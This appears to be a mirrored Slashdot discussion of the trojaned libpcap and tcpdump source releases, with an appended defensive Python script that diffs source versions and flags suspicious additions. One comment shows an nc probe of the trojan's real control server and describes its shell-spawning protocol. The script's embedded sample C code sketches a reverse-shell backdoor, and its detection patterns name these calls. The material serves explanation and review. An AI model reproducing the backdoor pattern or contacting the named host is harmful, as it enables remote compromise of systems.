Slashdot Mirror


Trojan Found in libpcap and tcpdump

msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."

19 of 486 comments

  1. Eventually, this would happen by Rotten · · Score: 5, Insightful

    And if I don't remember, this happened before. Of course this is one of the biggest strengths of the Open Source Model.
    Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows, but with Open Source it is easily detected.

    1. Re:Eventually, this would happen by Rotten · · Score: 4, Insightful

      Of course you have never dissected a rootkited server. Nobody trusts the date stamps, not even my grandmother does.

      Have you ever changed the date of a file? It's quite easy.

    2. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      In handling the press and public perception for this, it's important that we make the point that binary programs are trojaned all of the time. In fact, most viruses have as their sole purpose the modification of binaries to insert a trojan copy of the virus into the binary, and to execute the virus payload. Much proprietary software has been distributed in infected state.

      The difference is that with Open Source you have an additional means of detecting the corruption - not only by its effects (as with the binary), but by reading the source.

      Bruce

    3. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      Also, we need to get better about signing our archives and heeding the signatures. C'mon folks! I wrote about this in the old linuxworld.com webzine in 1996!

      Bruce

  2. MD5 checksums by Zayin · · Score: 4, Insightful

    Use them.

    --
    "I'd rather have a full bottle in front of me than a full frontal lobotomy"
    1. Re:MD5 checksums by diamondc · · Score: 5, Insightful

      If someone breaks into an ftp server, they might as well replace the md5 signatures, too. A better solution would be signing the sources with a gpg key.

      --
      "I keep looking in the want-ads under 'revolutionary' but there don't seem to be any listings.. "
  3. One too many? by simpleguy · · Score: 4, Insightful

    Isn't this one too many?

    There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?

    Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors? Or maybe there is a *VERY NASTY* exploit circulating privately?

    At least that's what I think.

    1. Re:One too many? by LostCluster · · Score: 5, Insightful

      As Linux becomes more popular, the dumber system admins who never patched their Windows systems now have Linux systems. All it takes is a small handful of people to not know there is a wide-open back door, or worse yet know but be too lazy to take the corrective action, and there's enough zombies to cause headaches.

  4. Re:This is dreadful by jimand · · Score: 5, Insightful

    there's no-one to pay me to pay my staff for the lost man-hours caused by this

    Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.

  5. Don't jump to conclusions by astrashe · · Score: 5, Insightful

    The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.

    It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.

  6. Re:Seems by paranoos · · Score: 5, Insightful

    If some malicious coder could upload manipulated software, do you not think they could also spoof the MD5 sum also? From what I've seen, the checksum is usually just stored in a text file in the same directory.

  7. Re:This is dreadful by gowen · · Score: 5, Insightful
    I run a successful London-based dot com
    Wow. And just minutes ago you were a successful lawyer. I'm so jealous.
    --
    Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
  8. Uncommented trojan by magi · · Score: 5, Insightful

    The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It doesn't even have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.

    Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.

    Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

    I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.

    Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.

  9. Re:This is dreadful by Hostile17 · · Score: 5, Insightful

    "It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "

    And this is different from Closed Source how ?

    Doesn't the money come from the money you've saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!

    Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.

    --
    Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussoli
  10. DEMAND PGP SIGNATURES!!!! by aphor · · Score: 5, Insightful

    The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.

    Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bitten, but the key will be exposed and others will be able to quickly identify their risk.

    At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!

    --
    --- Nothing clever here: move along now...
    1. Re:DEMAND PGP SIGNATURES!!!! by jonabbey · · Score: 5, Insightful

      And for god's sake, keep your private signing key encrypted in your gpg keyring, or offline.

  11. Re:Glad I use Gentoo by taviso · · Score: 4, Insightful

    I think the worst thing is that the server the trojan connects to is still operating :

    $ nc -vvv 212.146.0.34 1963
    mars.raketti.net [212.146.0.34] 1963 (?) open
    M sent 0, rcvd 1


    The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:

    A - program exits
    D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
    M - closes connection, sleeps 3600 seconds, and then reconnects


    maybe someone should contact the machine administrator before more people get owned.

    --
    ex$$
  12. How is this fair? by kiwimate · · Score: 5, Insightful

    This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

    All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

    And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.

    Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.

  13. Re:as soon as this evening... by harlows_monkeys · · Score: 5, Insightful
    The funny thing about the paranoids who build from source is that, unless they actually look at the source, it doesn't gain them anything. There are three ways to build from source.

    1. Just grab the source and build it. This is no better than grabbing a binary and running it, as far as security goes.

    2. Grab the source, check the MD5 sum, and then build it. This is no better than grabbing the binary, checking the binary's MD5 sum, and then running it.

    3. Grab the source, diff it against the previous source you were running, and at least glance at the diffs to see if anything looks suspicious. This is the only way that using source gives you more security than using the binary.

    People using source for security who are in category 1 or 2 are just fooling themselves.
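As an added example (not code from the original page, nor from the tcpdump or libpcap projects), here is a small Python script implementing the third approach above: it diffs a freshly downloaded source file against the previously reviewed copy and flags only the added lines that introduce network calls, process spawning, file-descriptor redirection, shell paths, hard-coded IP addresses or new networking headers, the shape of behaviour taviso describes earlier in the thread. Both source files are constructed sample input embedded in the script; the pattern list and the 192.0.2.10:1963 address in the sample are assumptions made for illustration, not the actual trojan code.

```python
import difflib
import re

# Constructed sample: the previously reviewed copy of a source file.
# Invented for this example; not real tcpdump/libpcap code.
OLD_SOURCE = """\
#include <stdio.h>
#include <pcap.h>

int open_device(const char *dev)
{
    char errbuf[PCAP_ERRBUF_SIZE];
    pcap_t *p = pcap_open_live(dev, 65535, 1, 1000, errbuf);
    if (p == NULL) {
        fprintf(stderr, "%s\\n", errbuf);
        return -1;
    }
    pcap_close(p);
    return 0;
}
"""

# Constructed sample: the freshly downloaded copy, with an inserted function
# shaped like the behaviour described in the thread (connect to a hard-coded
# host:port, fork, redirect fds, spawn a shell). Deliberately a sketch
# (undeclared 'a', elided sockaddr setup); the address is an assumption.
NEW_SOURCE = """\
#include <stdio.h>
#include <pcap.h>
#include <sys/socket.h>
#include <unistd.h>

static int x1(void)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    /* ... fill in sockaddr a for 192.0.2.10 port 1963 ... */
    if (connect(s, (struct sockaddr *)&a, sizeof a) != 0) return 0;
    if (fork() == 0) {
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
        execl("/bin/sh", "sh", (char *)0);
    }
    return 0;
}

int open_device(const char *dev)
{
    char errbuf[PCAP_ERRBUF_SIZE];
    pcap_t *p;
    x1();
    p = pcap_open_live(dev, 65535, 1, 1000, errbuf);
    if (p == NULL) {
        fprintf(stderr, "%s\\n", errbuf);
        return -1;
    }
    pcap_close(p);
    return 0;
}
"""

# Review heuristics (assumed list): things a packet-capture library has little
# reason to start doing between two releases.
SUSPICIOUS = [
    ("network-call", re.compile(r"\b(socket|connect|bind|listen|accept|sendto|recvfrom)\s*\(")),
    ("process-spawn", re.compile(r"\b(v?fork|system|popen|execl[pe]?|execv[pe]?|execve)\s*\(")),
    ("fd-redirect", re.compile(r"\bdup2?\s*\(")),
    ("shell-path", re.compile(r"/bin/(ba)?sh\b")),
    ("hardcoded-ipv4", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("network-header", re.compile(r"#include\s*<(sys/socket|netinet/in|arpa/inet)\.h>")),
]


def added_lines(old, new):
    """Return [(line_no_in_new, text)] for lines present in new but not in old."""
    old_lines, new_lines = old.splitlines(), new.splitlines()
    sm = difflib.SequenceMatcher(a=old_lines, b=new_lines, autojunk=False)
    out = []
    for tag, _i1, _i2, j1, j2 in sm.get_opcodes():
        if tag in ("insert", "replace"):
            out.extend((j + 1, new_lines[j]) for j in range(j1, j2))
    return out


def review_diff(old, new):
    """Flag every added line that matches a SUSPICIOUS pattern; unchanged and
    removed lines are ignored, so a clean upgrade yields an empty list."""
    findings = []
    for lineno, text in added_lines(old, new):
        for category, rx in SUSPICIOUS:
            if rx.search(text):
                findings.append({"line": lineno, "category": category, "text": text.strip()})
    return findings


def unified(old, new, old_name="previous/file.c", new_name="downloaded/file.c"):
    """Plain unified diff, for the human glance harlows_monkeys recommends."""
    return "".join(difflib.unified_diff(old.splitlines(True), new.splitlines(True), old_name, new_name))


if __name__ == "__main__":
    print(unified(OLD_SOURCE, NEW_SOURCE))
    for f in review_diff(OLD_SOURCE, NEW_SOURCE):
        print(f"line {f['line']:>3} [{f['category']}] {f['text']}")
```

The heuristics only narrow the reading; they do not replace it. A backdoor that hides behind a macro or downloads its payload from a build script will not match any of these patterns, so the unified diff still has to be read, and the comparison is only meaningful if the previous copy was itself verified (ideally against a signature, not an MD5 file sitting in the same directory).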